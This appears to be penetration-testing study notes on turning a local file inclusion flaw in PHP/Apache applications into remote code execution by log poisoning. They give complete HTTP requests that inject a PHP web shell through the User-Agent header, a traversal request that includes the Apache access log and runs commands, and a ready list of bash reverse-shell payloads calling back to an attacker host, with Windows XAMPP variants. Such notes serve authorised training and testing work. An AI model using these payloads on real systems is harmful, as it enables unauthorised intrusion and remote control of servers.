Apache & PHP <3
Our goal is to obtain Remote Code Execution (RCE) via an LFI vulnerability. We will do this with the help of Log Poisoning. Log Poisoning works by modifying data we send to a web application so that the logs contain executable code.
we will try to write executable code to Apache's access.log file in the /var/log/apache2/ (/var/log/apache2/access.log) directory. We'll first need to review what information is controlled by us and saved by Apache in the related log. In this case, "controlled" means that we can modify the information before we send it to the web application. We can either read the Apache web server documentation or display the file via LFI.
Example Request:
GET /meteor/index.php?page=admin.php HTTP/1.1
Host: 192.168.208.16
User-Agent: Mozilla/5.0 <?php echo system($_GET['cmd']); ?>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: redirect_to=%2Fetc%2Fpasswd
Upgrade-Insecure-Requests: 1
GET /meteor/index.php?page=../../../../../../../../../var/log/apache2/access.log&cmd=ps HTTP/1.1
Host: 192.168.208.16
User-Agent: curl/7.88.1
Accept: */*
Connection: close
Payloads That can be used:
<?php echo system($_GET['cmd']); ?>
bash -i >& /dev/tcp/192.168.119.3/4444 0>&1
bash -c "bash -i >& /dev/tcp/192.168.119.3/4444 0>&1"
Faster way:
bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{ip}%2F{port}%200%3E%261%22let's briefly explore LFI attacks on Windows targets. Exploiting LFI on Windows only differs from Linux when it comes to file paths and code execution. The PHP code snippet we used in this section for Linux also works on Windows, since we use the PHP system function that is independent from the underlying operating system. When we use Log Poisoning on Windows, we should understand that the log files are located in application-specific paths. For example, on a target running XAMPP, the Apache logs can be found in C:\xampp\apache\logs.
Exploiting File Inclusion vulnerabilities depends heavily on the web application's programming language, the version, and the web server configuration. Outside PHP, we can also leverage LFI and RFI vulnerabilities in other frameworks or server-side scripting languages including Perl, Active Server Pages Extended, Active Server Pages, and Java Server Pages. Exploiting these kinds of vulnerabilities is very similar across these languages.
Let's consider an LFI vulnerability in a JSP web application. If we can write JSP code to a file using Log Poisoning and include this file with the LFI vulnerability, the code will be executed. The only difference between this example and the previous PHP demonstration is that the code snippet used for the Log Poisoning would be in a different language.
In real-life assessments, we'll most often discover File Inclusion vulnerabilities in PHP web applications, since most of the other frameworks and server-side scripting languages are dated and therefore less common. Additionally, modern frameworks and languages are often by design not vulnerable or have protection mechanisms enabled by default against LFI. However, we should be aware that we can also find LFI vulnerabilities in modern back-end JavaScript runtime environments like Node.js.
Apache access.log in Windows
C:\xampp\apache\logs\access.logGET /meteor/index.php?page=../../apache/logs/access.log HTTP/1.1
Host: 192.168.208.193
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: redirect_to=%2F
Upgrade-Insecure-Requests: 1
Last updated